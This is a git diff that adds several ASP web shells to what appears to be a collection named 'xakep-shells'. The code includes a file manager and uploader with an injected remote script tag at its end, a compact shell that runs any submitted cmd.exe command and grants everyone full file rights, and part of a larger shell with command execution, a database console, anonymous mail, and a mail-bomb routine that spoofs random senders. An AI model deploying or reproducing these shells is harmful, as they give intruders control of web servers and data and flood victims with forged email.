+	response.write "<font face=arial size=-1 color=red>Path not found...</font>"
+
+	case "424"
+	response.write "<font face=arial size=-1 color=red>Missing, Insufficient data OR file is readonly...</font>"
+	
+	case else
+	response.write "<font face=arial size=-1 color=red>" & err.description & "</font>"
+
+end select
+'---Report errors end
+%>
+<center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shagalot</TT></font></center>
+<font face=Courier>
+<table><tr><td>
+<form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" name="myform" >
+<Table bgcolor=#505050 ><tr><td bgcolor=#505050 >
+<font face=Arial size=-2 color=#ff8300 > PATH INFO : </font></td><td align=right ><font face=Arial size=-2 color=#ff8300 >Volume Label:</font> <%=drv.VolumeName%> </td></tr>
+<tr><td colspan=2 cellpadding=2 bgcolor=#303030 ><font face=Arial size=-1 color=gray>Virtual: http://<%=Request.ServerVariables("SERVER_NAME")%><%=Request.Servervariables("SCRIPT_NAME")%></Font><BR><font face=wingdings color=Gray >1</font><font face=Arial size=+1 > <%=showPath%></Font>
+<BR><input type=text width=40 size=60 name=txtpath value="<%=showPath%>" ><input type=submit name=cmd value="  View  " >
+</td></tr></form></table>
+</td><td><center>
+<table bgcolor=#505050 cellpadding=4><tr><td bgcolor=black ><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?getDRVs=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>Retrieve Available Network Drives</a></td></tr>
+<tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>SQL Query Analyser</A></td></tr>
+<tr><td bgcolor=black  align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?logoff=@&...thankyou.for.using.ASpyder....~sir_shagalot!..[shagzzz.cjb.net]"><font size=-2 face=arial>+++LOGOFF+++</A></td></tr></table>
+</td></tr></table>
+<p align=center ><Table width=75% bgcolor=#505050 cellpadding=4 ><tr><td>
+<form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" ><font face=arial size=-1 >Delete file from current directory:</font><BR>
+<select size=1 name=ToDelete >
+<option>------------------------------</option>"
+<%
+fi=0
+For each file in folder.Files
+	Response.Write "<option>" & file.name & "</option>"
+fi=fi+1
+next
+	Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value=Delete ></form></td><td>"
+	Response.Write "<form method=post name=frmCopyFile action=""" & Request.Servervariables("SCRIPT_NAME") & """ ><font face=arial size=-1 >Copy file too current directory:</font><br><select size=1 name=ToCopy >"
+	Response.Write "<option>------------------------------</option>"
+For each file in fileCopy.Files
+	Response.Write "<option>" & file.name & "</option>"
+next
+	Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value=""  Copy "" ></form></td></tr></Table>"
+Response.Flush
+' ---View Tree Begins Here
+	Response.Write "<table Cellpading=2 width=75% bgcolor=#505050 ><tr><td valign=top width=50% bgcolor=#303030 >Folders:<BR><BR>"
+fo=0
+	Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#c8c8c8><span style='cursor: hand;' OnClick=""getit('..')"">..</span></FONT><BR>"
+
+For each fold in folder.SubFolders '-->FOLDERz
+fo=fo+1
+	Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick=""getit('" & fold.name & "')"">" & fold.name & "</span></FONT><BR>"
+Next
+%>
+<BR><center><form method=post action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
+<table bgcolor=#505050 cellspacing=4><tr><td>
+<font face=arial size=-1 title="Create and Delete folders by entering their names here manually.">Directory:</td></tr>
+<tr><td align=right ><input type=text size=20 name=DirName><BR>
+<input type=submit name=cmd value=Create><input type=submit name=cmd value=Delete><input type=hidden name=DirStuff value=@>
+</tr></td></table></form>
+<%
+Response.Write "<BR></td><td valign=top width=50% bgcolor=#303030 >Files:<BR><BR>"
+Response.Flush
+%>
+	<form method=post name=frmCopySelected action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
+<%
+	Response.write "<center><select name=Fname size=" & fi+3 & " style=""background-color: rgb(48,48,48); color: rgb(210,210,210)"">"
+For each file in folder.Files '-->FILEz
+	Response.Write "<option value=""" & file.name & """>&nbsp;&nbsp;" & file.name & " -- [" & Int(file.size/1024)+1 & " kb]</option>"
+Next
+	Response.write "</select>"
+	Response.write "<br><input type=submit name=cmd value=""   Copy   ""><input type=submit name=cmd value=""Edit/Create""><input type=submit name=cmd value=Download>"
+%>
+	</form>
+<%
+	Response.Write "<BR></td></tr><tr><td align=center ><B>Listed: " & fo & "</b></td><td align=center ><b>Listed: " & fi & "</b></td></tr></table><BR>"
+' ---View Tree Ends Here
+' ---Upload Routine starts here
+%>
+	<form method="post" ENCTYPE="multipart/form-data" action="<%=Request.Servervariables("SCRIPT_NAME")%>?upload=@&txtpath=<%=MyPath%>">
+<table bgcolor="#505050" cellpadding="8">
+  <tr>
+    <td bgcolor=#303030 valign="bottom"><font size=+1 face=wingdings color=Gray >2</font><font face="Arial" size=-2 color="#ff8300"> SELECT FILES TO UPLOAD:<br>
+    <input TYPE="FILE" SIZE="53" NAME="FILE1"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE2"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE3"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE4"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE5"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE6"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE7"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE8"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE9"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE10"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE11"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE12"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE13"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE14"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE15"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE16"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE17"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE18"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE19"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE20"><BR>
+
+	&nbsp;&nbsp;<input TYPE="submit" VALUE="Upload !" name="Upload" TITLE="If you recieve an error while uploading, then most likely you do not have write access to disk !!">
+	</font></td>
+  </tr>
+</table>
+<BR>
+<table bgcolor="#505050" cellpadding="6">
+  <tr>
+    <td bgcolor="#000000" valign="bottom"><font face="Arial" size="-2" color=gray>NOTE FOR UPLOAD -
+    YOU MUST HAVE VBSCRIPT v5.0 INSTALLED ON YOUR WEB SERVER&nbsp; FOR THIS LIBRARY TO
+    FUNCTION CORRECTLY. YOU CAN OBTAIN IT FREE FROM MICROSOFT WHEN YOU INSTALL INTERNET
+    EXPLORER 5.0 OR LATER. WHICH IS, MOST LIKELY, ALREADY INSTALLED.</font></td>
+  </tr>
+</table>
+	</form>
+<%
+' ---Upload Routine stops here
+%>
+
+</font><HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=1 face=arial>[ System: <%=now%> ]</font></p><BR>
+</body></html>
+<SCRIPT SRC=http://www.saldiri.org/summer/ciz.js></SCRIPT>
diff --git a/xakep-shells/ASP/cmd-asp-5.1.asp.txt b/xakep-shells/ASP/cmd-asp-5.1.asp.txt
new file mode 100644
index 0000000..c4b93db
--- /dev/null
+++ b/xakep-shells/ASP/cmd-asp-5.1.asp.txt
@@ -0,0 +1,41 @@
+<%
+
+' ASP Cmd Shell On IIS 5.1
+' brett.moore_at_security-assessment.com 
+' http://seclists.org/bugtraq/2006/Dec/0226.html
+
+
+Dim oS,oSNet,oFSys, oF,szCMD, szTF
+On Error Resume Next
+Set oS = Server.CreateObject("WSCRIPT.SHELL")
+Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
+szCMD = Request.Form("C")
+If (szCMD <> "") Then
+  szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" &  oFSys.GetTempName()
+  ' Here we do the command
+  Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
+"""",0,True)
+  response.write szTF
+  ' Change perms
+  Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G
+everyone:F",0,True)
+  Set oF = oFSys.OpenTextFile(szTF,1,False,0)
+End If 
+%>
+<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
+<input type=text name="C" size=70 value="<%= szCMD %>">
+<input type=submit value="Run"></FORM><PRE>
+Machine: <%=oSNet.ComputerName%><BR>
+Username: <%=oSNet.UserName%><br>
+<% 
+If (IsObject(oF)) Then
+  On Error Resume Next
+  Response.Write Server.HTMLEncode(oF.ReadAll)
+  oF.Close
+  Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
+End If 
+
+%>
+
+<!--    http://michaeldaw.org   2006    -->
diff --git a/xakep-shells/ASP/elmaliseker.asp.txt b/xakep-shells/ASP/elmaliseker.asp.txt
new file mode 100644
index 0000000..26765f8
--- /dev/null
+++ b/xakep-shells/ASP/elmaliseker.asp.txt
@@ -0,0 +1,2324 @@
+<%
+
+' Tac gia: forever5pi (theo huong dan cua anh vicki-vkdt)
+' Email : forever5pi@yahoo.com
+' Website: http://vnhacker.org
+
+option explicit
+
+Server.ScriptTimeout=10000
+Response.Buffer=false
+
+dim gURL,gMsg
+dim targetPath,cp_dst,mv_dst,root
+dim FSO,re
+dim zombie_array,special_array
+
+' ###################################### CONFIGURATION ######################################
+
+const gPassword="" ' mat khau ("" : khong dung password)
+
+const gMax=50 ' chieu dai toi da cho ten file
+const gBomb=1000 ' so luong mail mac dinh can bomb
+
+const lnkExt="lnk,url"
+const editExt="htm,html,asp,asa,txt,inc,css,aspx,js,vbs,shtm,shtml,xml,xsl,log,ini,bat,bak" ' danh sach cac file cho phep edit
+
+const TmpDir="C:\" ' thu muc tam thoi mac dinh
+const Shell="cmd.exe" ' shell mac dinh
+
+' cac chuoi ket noi mac dinh
+const cstrMSSQL = "Provider=SQLOLEDB;Data Source=SERVER_NAME;database=DB_NAME;uid=UID;pwd=PWD"
+const cstrJET = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=full_path/db_file.mdb" 
+const cstrACCESS = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=full_path/db_file.mdb"
+const cstrORACLE = "Provider=OraOLEDB.Oracle.1; Data Source=DB_NAME; User ID=UID; Password=PWD"
+const cstrMYSQL = "Driver=MySQL;server=SERVER_IP;uid=UID;pwd=PWD;database=DB_NAME"
+const cstrDSN = "DSN_NAME"
+
+const bSize=false' co/khong hien folder-size
+
+const charset="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-" ' tap ki thu dung de sinh chuoi ngau nhien
+
+zombie_array=array("com","net","org","info","vn","cn") ' mang cac domain z0mbie
+special_array=array("yahoo.com","hotmail.com") ' mang cac domain dac biet (dung trong bomb mail)
+
+root=Server.MapPath(".") ' folder mac dinh
+
+' ###########################################################################################
+
+gURL=Request.ServerVariables("SCRIPT_NAME")
+Init()
+if (LCase(Left(Request.ServerVariables("HTTP_CONTENT_TYPE"),19))="multipart/form-data") and (Session("allow")=1) and (Session("mode")=0) then Upload()
+Secure()
+if Request.Form("command")="Logout" then Logout()
+if Request.Form("command")="ChangeMode" then
+Session("mode")=Request.Form("mode")
+Session("switch")=true
+end if
+select case Session("mode")
+case 0 myFile()
+case 1 myCMD()
+case 2 mySQL()
+case 3 myMail()
+end select
+
+'###########################################################################################
+
+sub myFile()
+if Session("switch")=true then
+targetPath=Session("targetPath")
+if targetPath="" then targetPath=root
+Session("switch")=false
+else
+targetPath=Trim(Request.Form("folder"))
+if targetPath="" then targetPath=root else targetPath=abspath(targetPath)
+
+select case Request.Form("command")
+case "Download"
+Download()
+exit sub
+case "Edit"
+Editor()
+exit sub
+case "ChangeAttributesFile","ChangeAttributesFolder"
+ChangeAttributesItem()
+exit sub
+case "Tree"
+Tree()
+exit sub
+case "Delete" Delete()
+case "Move" Move()
+case "Copy" Copy()
+case "ZipInfo" ZipInfo()
+case "NewFile","NewFolder" CreateItem()
+case "RenameFile","RenameFolder" RenameItem()
+case "OpenFolder" OpenFolder()
+case "LevelUp" targetPath=FSO.GetParentFolderName(abspath(Request.Form("folder")))
+case "LevelRoot" targetPath=findroot(abspath(Request.Form("folder")))
+end select
+
+Session("targetPath")=targetPath
+end if
+
+HtmlHeader("")
+HtmlMode()
+List()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub myCMD()
+dim bDoIt
+dim bEcho
+dim szTmpDir,szShell,szCmd,szTmpFile
+dim oScript,oScriptNet,oFile
+
+HtmlHeader("")
+HtmlMode()
+
+set oScript=Server.CreateObject("Wscript.Shell")
+set oScriptNet=Server.CreateObject("Wscript.Network")
+
+szTmpDir=Trim(Request.Form("tmpdir"))
+szShell=Trim(Request.Form("shell"))
+szCmd=Trim(Request.Form("cmd"))
+bEcho=CBool(Request.Form("echo"))
+
+if Session("switch")=true then
+Session("switch")=false
+bDoit=false
+szTmpDir=Session("szTmpDir")
+szShell=Session("szShell")
+szCmd=Session("szCmd")
+bEcho=Session("bEcho")
+else
+bDoIt=true
+end if
+
+if szTmpDir="" then szTmpDir=TmpDir else szTmpDir=abspath(szTmpDir)
+if szShell="" then szShell=Shell
+
+Session("szTmpDir")=szTmpDir
+Session("szShell")=szShell
+Session("szCmd")=szCmd
+Session("bEcho")=bEcho
+
+%>
+<form name=frmCMD method=post action="<%=gURL%>">
+<table>
+<tr><td><b>T</b>mpDir:</td><td><input type=text name=tmpdir value="<%=Server.HtmlEncode(szTmpDir)%>" size=20></td></tr>
+<tr><td><b>S</b>hell:</td><td><input type=text name=shell value="<%=Server.HtmlEncode(szShell)%>" size=20></td></tr>
+<tr><td><b>C</b>md:</td><td><input type=text name=cmd value="<%=Server.HtmlEncode(szCmd)%>" size=80> <input type=submit value=Go></td></tr>
+<tr><td><b>E</b>cho:</td><td><input type=checkbox name=echo value=1<%if bEcho then Response.Write " checked"%>></td></tr>
+</table>
+</form>
+<script>frmCMD.cmd.focus()</script>
+<%
+if (szCmd<>"") and (bDoIt=true) then
+if bEcho then
+call oScript.Run(szShell & " /c " & szCmd)
+else
+szTmpFile = addslash(szTmpDir) & FSO.GetTempName
+call oScript.Run(szShell & " /c " & szCmd & " > " & szTmpFile, 0, true)
+if FSO.FileExists(szTmpFile) then set oFile=FSO.OpenTextFile (szTmpFile, 1, false, 0)
+end if
+end if
+%>
+<p><%=FormatDate(Now)%>
+<p><b>I</b>P: <%=Request.ServerVariables("LOCAL_ADDR")%><br>
+<b>U</b>ser: \\<%=oScriptNet.ComputerName%>\\<%=oScriptNet.UserName%>
+<%
+if (IsObject(oFile)) then
+on error resume next
+%>
+<pre>
+<%=Server.HtmlEncode(oFile.ReadAll)%>
+</pre>
+<%
+oFile.Close
+call FSO.DeleteFile(szTmpFile, true)
+end if
+
+set oScript=nothing
+set oScriptNet=nothing
+
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub mySQL()
+dim szConn,szSQL1,szSQL2,szSQL,bDoIt
+dim intChoice
+
+HtmlHeader("")
+HtmlMode()
+
+szConn=Trim(Request.Form("conn"))
+szSQL1=Trim(Request.Form("sql1"))
+szSQL2=Trim(Request.Form("sql2"))
+intChoice=CInt(Request.Form("choice"))
+
+if Session("switch")=true then
+Session("switch")=false
+bDoIt=false
+szConn=Session("szConn")
+szSQL1=Session("szSQL1")
+szSQL2=Session("szSQL2")
+intChoice=Session("intChoice")
+else
+bDoIt=true
+end if
+
+if intChoice=0 then intChoice=1
+if intChoice=1 then szSQL=szSQL1 else szSQL=szSQL2
+
+Session("szConn")=szConn
+Session("szSQL1")=szSQL1
+Session("szSQL2")=szSQL2
+Session("intChoice")=intChoice
+
+select case trim(ucase(szConn))
+case "MSSQL" 
+szConn=cstrMSSQL
+szSQL=""
+case "JET"
+szConn=cstrJET
+szSQL=""
+case "ACCESS"
+szConn=cstrACCESS
+szSQL=""
+case "ORACLE"
+szConn=cstrORACLE
+szSQL=""
+case "MYSQL"
+szConn=cstrMYSQL
+szSQL=""
+case "DSN"
+szConn=cstrDSN
+szSQL=""
+end select
+%>
+<input type=button value="<->" onclick="changeInput()">
+<form name=frmSQL method=post action="<%=gURL%>">
+<input type=hidden name=choice value="<%=intChoice%>">
+<b>C</b>onn: <input type=text name=conn value="<%=Server.HtmlEncode(szConn)%>" size=90> <br>
+<b>S</b>QL:  <span id=s1<%if intChoice=2 then Response.Write " style=""display:none"""%>><input type=text name=sql1 value="<%=Server.HtmlEncode(szSQL1)%>" size=90></span>
+<span id=s2<%if intChoice=1 then Response.Write " style=""display:none"""%>>( [F9] = Go )<br><textarea name=sql2 cols=42 rows=12 onkeydown="if (event.keyCode==120) frmSQL.submit();"><%=Server.HtmlEncode(szSQL2)%></textarea><br></span>
+<input type=submit value=Go>
+</table>
+</form>
+<script>
+frmSQL.<%if szConn="" then Response.Write "conn" else Response.Write "sql"&intChoice%>.focus();
+frmSQL.<%if szConn="" then Response.Write "conn" else Response.Write "sql"&intChoice%>.focus();
+function changeInput() {
+if (s1.style.display=='none') {
+s1.style.display='inline';
+s2.style.display='none';
+frmSQL.choice.value="1";
+frmSQL.sql1.focus();
+} else {
+s1.style.display='none';
+s2.style.display='inline';
+frmSQL.choice.value="2";
+frmSQL.sql2.focus();
+}
+}
+</script>
+<%
+if (szConn<>"") and (szSQL<>"") and (bDoIt=true) then
+dim adoCon, rS
+dim i,intAffected
+
+set adoCon=Server.CreateObject("ADODB.Connection")
+adoCon.Open szConn
+set rS=adoCon.Execute(szSQL, intAffected)
+if (rS.Fields.Count>0) then
+' hien thi ten cua cac truong
+Response.Write "<table border=1>" & vbNewLine & "<tr>"
+for i=0 to rS.Fields.Count-1
+Response.Write "<td><tt><b>"
+if (rS.Fields(i).Name="") then
+Response.Write "(No column name)"
+else
+Response.Write Server.HtmlEncode(rS.Fields(i).Name)
+end if
+Response.Write "</b></tt></td>"
+next
+Response.Write "</tr>" & vbNewLine
+' hien thi du lieu tren cac dong
+on error resume next
+rS.MoveFirst
+do while not rS.EOF
+Response.Write "<tr>"
+for i=0 to rS.Fields.Count-1
+Response.Write "<td><tt>"
+if IsNull(rs.Fields(i).Value) then
+Response.Write "NULL"
+elseif (Trim(rs.Fields(i).Value)="") then
+Response.Write " "
+else
+Response.Write Server.HtmlEncode(rS.Fields(i).Value)
+end if
+Response.Write "</tt></td>"
+next
+Response.Write "</tr>" & vbNewLine
+rS.MoveNext
+loop
+rS.Close
+Response.Write "</table>" & vbNewLine
+end if
+
+Response.Write "<p><tt>(" & intAffected & " row(s) affected)</tt>"
+
+set rS=nothing
+set adoCon=nothing
+end if
+
+HtmlFooter()
+Destroy()
+end sub
+
+
+'###########################################################################################
+
+sub myMail()
+dim strFrom,strTo,strSubject,strBody,bHtml,intNumber,i,StartTime,EndTime,bDoIt
+dim objMail,objMsg
+
+strTo=Trim(Request.Form("to"))
+
+select case Request.Form("subcommand")
+case "Send"
+strFrom=Trim(Request.Form("from"))
+strSubject=Trim(Request.Form("subject"))
+strBody=Request.Form("body")
+bHtml=CBool(Request.Form("html"))
+case "Bomb"
+if IsNumeric(Request.Form("number")) then intNumber=Int(Request.Form("number"))
+strFrom=Session("strFrom")
+strSubject=Session("strSubject")
+strBody=Session("strBody")
+bHtml=Session("bHtml")
+end select
+
+if Session("switch")=true then
+Session("switch")=false
+bDoIt=false
+strFrom=Session("strFrom")
+strTo=Session("strTo")
+strSubject=Session("strSubject")
+strBody=Session("strBody")
+bHtml=Session("bHtml")
+intNumber=Session("intNumber")
+else
+bDoIt=true
+end if
+
+if (intNumber<=0) then intNumber=gBomb
+
+Session("strFrom")=strFrom
+Session("strTo")=strTo
+Session("strSubject")=strSubject
+Session("strBody")=strBody
+Session("bHtml")=bHtml
+Session("intNumber")=intNumber
+
+HtmlHeader("")
+HtmlMode()
+
+if bDoIt then
+select case Request.Form("subcommand")
+case "Send"
+if IsValidEmail(strTo) then
+set objMail=Server.CreateObject("CDONTS.NewMail")
+objMail.To=strTo
+objMail.From=strFrom
+objMail.Subject=strSubject
+objMail.Body=strBody
+if bHtml then
+objMail.BodyFormat=0 'HTML
+objMail.MailFormat=0 'MIME
+end if
+objMail.Send
+set objMail=nothing
+Response.Write "<b>M</b>essage was sent to " & strTo & " successfully." & vbNewLine
+end if
+case "Bomb"
+if IsValidEmail(strTo) then
+Response.Write "<b>B</b>ombing " & Replace(FormatNumber(intNumber,0),",",".") & " mail"
+if intNumber>1 then Response.Write "s"
+Response.Write " to " & strTo & " ... "
+StartTime=Timer
+set objMsg=Server.CreateObject("CDO.Message")
+objMsg.To=strTo
+Randomize
+for i=1 to intNumber
+objMsg.From=makeEmail()
+objMsg.Subject=makeText(Int((50-25+1)*Rnd+25))
+objMsg.TextBody=makeText(Int((100-50+1)*Rnd+50))
+objMsg.Send
+next
+set objMsg=nothing
+EndTime=Timer
+Response.Write howlong(EndTime-StartTime) & vbNewLine
+end if
+end select
+end if
+%>
+<p>
+<table border=1>
+<tr>
+<td width=50%>
+<form name=frmSend method=post action="<%=gURL%>">
+<table>
+<tr>
+<td colspan=2>a) <b>A</b>nonymous Mail</td>
+</tr>
+<tr>
+<td><b>F</b>rom:</td>
+<td><input type=text name=from value="<%=Server.HtmlEncode(strFrom)%>" size=25></td>
+</tr>
+<tr>
+<td><b>T</b>o:</td>
+<td><input type=text name=to value="<%=Server.HtmlEncode(strTo)%>" size=25></td>
+</tr>
+<tr>
+<td><b>S</b>ubject:</td>
+<td><input type=text name=subject value="<%=Server.HtmlEncode(strSubject)%>" size=50></td>
+</tr>
+<tr>
+<td valign=top><b>B</b>ody:</td>
+<td><textarea name=body cols=37 rows=12><%=Server.HtmlEncode(strBody)%></textarea></td>
+</tr>
+<tr>
+<td><b>H</b>tml:</td>
+<td><input type=checkbox name=html value=1<%if bHtml=true then Response.Write " checked"%>></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=subcommand value=Send></td>
+</tr>
+</table>
+</form>
+</td>
+<td width=50% valign=top>
+<form name=frmBomb method=post action="<%=gURL%>">
+<table>
+<tr>
+<td colspan=2>b) <b>B</b>omb Mail</td>
+</tr>
+<tr>
+<td><b>A</b>ddress:</td>
+<td><input type=text name=to value="<%=Server.HtmlEncode(strTo)%>" size=25></td>
+</tr>
+<tr>
+<td><b>N</b>umber:</td>
+<td><input type=text name=number value=<%=intNumber%>></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=subcommand value=Bomb></td>
+</tr>
+</table>
+</form>
+</td>
+</tr>
+</table>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+function IsValidEmail(strEAddress)
+dim objRegExpr
+set objRegExpr = New RegExp
+objRegExpr.Pattern = "^[a-zA-Z0-9][\w\.-]*[a-zA-Z0-9]@[\w-\.]*[a-zA-Z0-9]\.[a-zA-Z]{2,7}$"
+objRegExpr.Global = true
+objRegExpr.IgnoreCase = False
+IsValidEmail = objRegExpr.Test(strEAddress)
+set objRegExpr = nothing
+end function
+
+'###########################################################################################
+
+function makeEmail()
+Randomize
+if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & "@" & makeText(8) & "." & zombie_array(Int((UBound(zombie_array)-0+1)*Rnd+0)) else makeEmail=makeText(8) & "@" & special_array(Int((UBound(special_array)-0+1)*Rnd+0))
+end function
+
+'###########################################################################################
+
+function makeText(intLen)
+dim strNewText,i
+strNewText=""
+Randomize
+for i=1 to intLen
+strNewText=strNewText & Mid(charset,Int((Len(charset)-1+1)*Rnd+1),1)
+next
+makeText=strNewText
+end function
+
+'###########################################################################################
+
+function howlong(intTime)
+if (intTime<60) then
+howlong=intTime & " second(s)"
+elseif (intTime<60*60) then
+howlong=FormatNumber(intTime/60,2) & " minute(s)"
+else
+howlong=FormatNumber(intTime/(60*60),2) & " hour(s)"
+end if
+end function
+
+'###########################################################################################
+
+sub Tree()
+dim path
+path=abspath(Request.Form("param"))
+if FSO.FolderExists(path) then
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=path%></title>
+<style>
+body,td{font-family:Fixedsys}
+a{color:#0000ff}
+</style>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<%
+tree_dir(path)
+%>
+</body>
+</html>
+<%
+else
+%>
+<script>alert('Folder not found !');window.close();</script>
+<%
+end if
+Destroy()
+end sub
+
+sub tree_dir(path)
+dim strAttrib,strSize
+
+on error resume next
+
+dim oFolder
+dim oSubFolders,oSubFolder
+dim oFiles,oFile
+dim oSubFolders2,oSubFolder2
+dim oFiles2,oFile2
+
+set oFolder=FSO.GetFolder(path)
+set oSubFolders=oFolder.SubFolders
+set oFiles=oFolder.Files
+
+Response.Write "<p>" & FSO.GetAbsolutePathName(path)
+
+strAttrib=GetAttributes(oFolder.Attributes)
+
+if strAttrib<>" " then Response.Write " (" & GetAttributes(oFolder.Attributes) & ")"
+
+Response.Write vbNewLine
+
+if (oSubFolders.Count>0) or (oFiles.Count>0) then
+%>
+<table border=0 cellspacing=1 cellpadding=2 bgcolor=#ff0000>
+<tr bgcolor=#000000>
+<td><font color=#FFFF00>Name</font></td>
+<td align=center><font color=#FFFF00>Size</font></td>
+<td align=center><font color=#FFFF00>Type</font></td>
+<td align=center><font color=#FFFF00>Modified</font></td>
+<td align=center><font color=#FFFF00>Attributes</font></td>
+</tr>
+<%
+' liet ke thu muc
+for each oSubFolder in oSubFolders
+%>
+<tr bgcolor=#000000>
+<td><%=oSubFolder.Name%></td>
+<td align=right> </td>
+<td align=center>DIR</td>
+<td align=center><%=FormatDate(oSubFolder.DateLastModified)%></td>
+<td><%=GetAttributes(oSubFolder.Attributes)%></td>
+</tr>
+<%
+next
+
+' liet ke file
+for each oFile in oFiles
+%>
+<tr bgcolor=#000000>
+<td<%if (FSO.GetExtensionName(path & "\" & oFile.Name)="lnk") or (FSO.GetExtensionName(path & "\" & oFile.Name)="url") then Response.Write " title=""" & FindLink(path & "\" & oFile.Name) & """"%>><%=oFile.Name%></td>
+<td align=right><%=FormatSize(oFile.Size)%></td>
+<td align=center><%=oFile.Type%></td>
+<td align=center><%=FormatDate(oFile.DateLastModified)%></td>
+<td><%=GetAttributes(oFile.Attributes)%></td>
+</tr>
+<%
+next
+strSize=FormatSize(oFolder.Size)
+%>
+<tr bgcolor=#000000>
+<td colspan=5 align=center><%=oSubFolders.Count%> folder(s), <%=oFiles.Count%> file(s)<%if strSize<>"" then Response.Write " (" & strSize & ")"%></td>
+</tr>
+</table>
+<%
+' goi de qui
+for each oSubFolder in oSubFolders
+set oSubFolder2=oSubFolder.SubFolders
+set oFile2=oSubFolder.Files
+
+if (oSubFolder2.Count>0) or (oFile2.Count>0) then
+tree_dir(oSubFolder.ParentFolder & "\" & oSubFolder.Name)
+end if
+
+set oSubFolder2=nothing
+set oFile2=nothing
+next
+end if
+
+set oSubFolder=nothing
+set oFiles=nothing
+set oFolder=nothing
+end sub
+
+'###########################################################################################
+
+sub Editor()
+dim f,name,path
+
+on error resume next
+
+HtmlHeader("")
+
+name=Request.Form("param")
+path=addslash(targetPath) & name
+
+select case Request.Form("subcommand")
+case "Save","SaveAs"
+set f=FSO.OpenTextFile(path,2,true,-2)
+if Err.Number<>0 then
+gMsg="Can not write to the file """ & name & """, permission denied!"
+Err.Clear
+else
+f.Write Request.Form("content")
+end if
+set f=nothing
+set f=FSO.OpenTextFile(path,1,false,-2)
+case else
+if not FSO.FileExists(path) then
+gMsg="The file """ & name & """ does not exist"
+set f=FSO.CreateTextFile(path,false)
+if Err.Number<>0 then
+gMsg=gMsg & ", also unable to create new file."
+Err.Clear
+else
+gMsg=gMsg & ", created new file."
+end if
+else
+set f=FSO.OpenTextFile(path,1,false,-2)
+if Err.Number<>0 then
+gMsg="Can not read from the file """ & name & """, permission denied!"
+Err.Clear
+end if
+end if
+end select
+%>
+<% if gMsg<>"" then Response.Write "<script>alert('" & gMsg & "')</script>" & vbNewLine %>
+<p><b>E</b>diting - "<%=path%>"<br>
+<form name=frmFile method=post action="<%=gURL%>">
+<b>W</b>rap<input type=checkbox id=wrap onclick="EditorCommand('WordWrap')">
+<center>
+<table width=100%>
+<tr><td align=center>
+<textarea name=content rows=25 cols=46 style="width:580;height:330" wrap=off><%=Server.HTMLEncode(f.ReadAll)%></textarea>
+</td></tr>
+<tr><td align=center>
+<input type=button value=Save onclick="EditorCommand('Save')"> <input type=button value="Save As" onclick="EditorCommand('SaveAs')"> <input type=button value=Reload onclick="EditorCommand('Reload')"> <input type=button value=Close onclick="window.close()">
+</td></tr>
+</table>
+</center>
+<script>frmFile.content.focus()</script>
+<input type=hidden name=command value=Edit>
+<input type=hidden name=subcommand value="">
+<input type=hidden name=param value="<%=name%>">
+<input type=hidden name=folder value="<%=Request.Form("folder")%>">
+</form>
+<%
+set f=nothing
+HtmlJsEditor()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub ChangeAttributesItem()
+dim item,itemType,itemName,itemPath,itemAttrib
+
+itemType=Request.Form("command")
+itemName=Request.Form("param")
